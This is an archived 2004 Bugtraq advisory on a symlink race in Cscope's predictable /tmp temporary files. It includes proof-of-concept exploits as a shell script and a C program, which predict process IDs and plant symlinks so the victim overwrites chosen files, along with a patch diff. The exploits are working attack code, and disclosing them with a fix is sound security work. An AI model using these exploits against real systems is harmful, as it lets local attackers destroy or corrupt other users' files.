RX171104 Cscope v15.5 and minors - symlink vulnerability - advisory, exploit and patch.
Date: Thu, 18 Nov 2004 01:27:18 +0400
From: rexolab <research@rexotec.com.>
To: bugtraq@securityfocus.com, cert@cert.org, broeker@users.sourceforge.net,
Subject: RX171104 Cscope v15.5 and minors - symlink vulnerability - advisory, exploit and patch.
|############################ REXOTEC(dot)COM #############################=
##
|
|=3D-----=3D[ ADV RX171104 - Cscope :: Race condition on temporary file ]-=
----=3D|
|
|
|=3D---[ - INFORMATION
`---------------------------------------------------------------------=
-|
VulnDiscovery: 2003/05/21
Release Date : 2004/11/17
Author : Gangstuck / Psirac <research@rexotec.com.>
Application : Cscope
Affected : All version (last one is cscope-15.5)
Platforms : Linux, SCO, SunOS/Solaris, ...
Risk : Critical
Severity : Allow local user to compromise filesystem.
Vendor : http://cscope.sourceforge.net/
Reference : http://www.rexotec.com/advisory/RX171104.html
Status : vendor has just been notified.
|=3D---[ - SUMMARY OVERVIEW
`---------------------------------------------------------------------=
-|
Cscope is a developper's tool under the BSD license used to browse=20
source code.
His Unix pedigree is impeccable and has originally been developped at=20
Bell Labs back in PDP-11's days. Cscope was a part of the official=20
AT&T Unix distribution for many years and has been used to manage
projects involving 20 million lines of code !
|=3D---[ - VULNERABILITY OVERVIEW
`---------------------------------------------------------------------=
-|
First, the temporary directory (P_tmpdir=3D"/tmp") is badly handled=20
in every myfopen() internal call.
As all we know, creation of predictable temporary file allows any=20
local attacker to remove arbitrary files on the vulnerable file=20
system via the infamous symlink vulnerability.
/src/main.c :
----------;
[...]
char temp1 [PATHLEN + 1]; /* temporary file name */
char temp2 [PATHLEN + 1]; /* temporary file name */
[...]
tmpdir =3D mygetenv("TMPDIR", TMPDIR);
[...]
/* create the temporary file names */
pid =3D getpid();
(void) sprintf(temp1, "%s/cscope%d.1", tmpdir, pid);
(void) sprintf(temp2, "%s/cscope%d.2", tmpdir, pid);
[...]
=09
Before us are the computing of two predictable files names (resulting
in a schema like "/tmp/cscopeNEXTPID.numba"). So, we just have to pro=
be=20
the pid numba and make the same template which to be used for
temporary file creation. Then, cscope handle the files with
wrong set of flags and compromise root filesystem due=20
to symlink vulnerability.
=09
|=3D---[ - EXPLOITS - Proof of concept
`---------------------------------------------------------------------=
-|
---8<--------8<-------cut-here-------8<--------8<---
#!/bin/sh
#################################################################
# RXcscope_proof.sh
# brute force case baby
# cscope advisory and exploit by Gangstuck / Psirac <research@rexotec.com.>
#################################################################
HOWM=3D30 =20
CURR=3D`ps | grep ps | awk '{print $1}'` =20
NEXT=3D`expr $CURR + 5 + $HOWM \* 2 + 1` =20
LAST=3D`expr $NEXT + $HOWM` =20
echo -e "\n--=3D Cscope Symlink Vulnerability Exploitation =3D--\n"\
" [versions 15.5 and minor]\n"\
" Gangstuck / Psirac\n"\
" <research@rexotec.com.>\n\n"
if [ $# -lt 1 ]; then
echo "Usage: $0 <file1> [number_of_guesses]"
exit 1
fi=20
rm -f /tmp/cscope*
echo "Probed next process id ........ [${NEXT}]"
while [ ! "$NEXT" -eq "$LAST" ]; do
ln -s $1 /tmp/cscope${NEXT}.1; NEXT=3D`expr $NEXT + 1`
ln -s $1 /tmp/cscope${NEXT}.2; NEXT=3D`expr $NEXT + 1`
done
---8<--------8<-------cut-here-------8<---------8<---
/* RXcscope exploit version 15.5 and minor */
#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <unistd.h>
#define BSIZE 64
int=20
main(int ac, char *av[]) {
pid_t cur;
u_int i=3D0, lst;=09
char buffer[BSIZE + 1];
=09
fprintf(stdout, "\n --[ Cscope Exploit ]--\n"\
" version 15.5 and minor \n" \
" Gangstuck / Psirac\n" \
" <research@rexotec.com.>\n\n");
=09
if (ac !=3D 3) {
fprintf(stderr, "Usage: %s <target> <max file creation>\n", av[0]);
return 1;
}
=09
cur=3Dgetpid();
lst=3Dcur+atoi(av[2]);
=09
fprintf(stdout, " -> Current process id is ..... [%5d]\n" \
" -> Last process id is ........ [%5d]\n", cur, lst);
=09
while (++cur !=3D lst) {
snprintf(buffer, BSIZE, "%s/cscope%d.%d", P_tmpdir, cur, (i=3D=3D2) ? --i=
: ++i);
symlink(av[1], buffer);
}
return 0;
}
---8<----------8<-------cut-here-------8<-------------8<---
|=3D---[ - PATCH
`---------------------------------------------------------------------=
-|
/*
* Cscope patch by REXOTEC - version 15-5 and minors
* <research@rexotec.com.>
*/
diff -Naurp src/build.c src/build.c
--- src/build.c 2003-03-05 11:43:59.000000000 +0100
+++ src/build.c 2004-11-17 15:01:01.000000000 +0100
@@ -333,7 +333,7 @@ build(void)
(void) fprintf(stderr, "cscope: cannot open file %s\n", reffile);
myexit(1);
}
- if (invertedindex =3D=3D YES && (postings =3D myfopen(temp1, "wb")) =3D=
=3D NULL) {
+ if (invertedindex =3D=3D YES && (postings =3D myfopen(temp1, "w+xb")) =3D=
=3D NULL) {
cannotwrite(temp1);
cannotindex();
}
diff -Naurp src_old/display.c src/display.c
--- src/display.c 2003-09-04 17:54:02.000000000 +0200
+++ src/display.c 2004-11-17 15:01:01.000000000 +0100
@@ -754,13 +754,13 @@ BOOL
writerefsfound(void)
{
if (refsfound =3D=3D NULL) {
- if ((refsfound =3D myfopen(temp1, "wb")) =3D=3D NULL) {
+ if ((refsfound =3D myfopen(temp1, "w+xb")) =3D=3D NULL) {
cannotopen(temp1);
return(NO);
}
} else {
(void) fclose(refsfound);
- if ( (refsfound =3D myfopen(temp1, "wb")) =3D=3D NULL) {
+ if ( (refsfound =3D myfopen(temp1, "w+xb")) =3D=3D NULL) {
postmsg("Cannot reopen temporary file");
return(NO);
}
|=3D---[ - GREETS
`---------------------------------------------------------------------=
-|
All the sa=EFan subk crew (marty, med, ezek, rea, jethro, rolphin, candy=
,=20
ad, titox), descript, crazyl0rd/tium, xia, antho, ceb, lionel, domi=20
#subkulture / #ids on undernet, ...
--=20
cheers,
gangstuck and psirac <research@rexotec.com.>
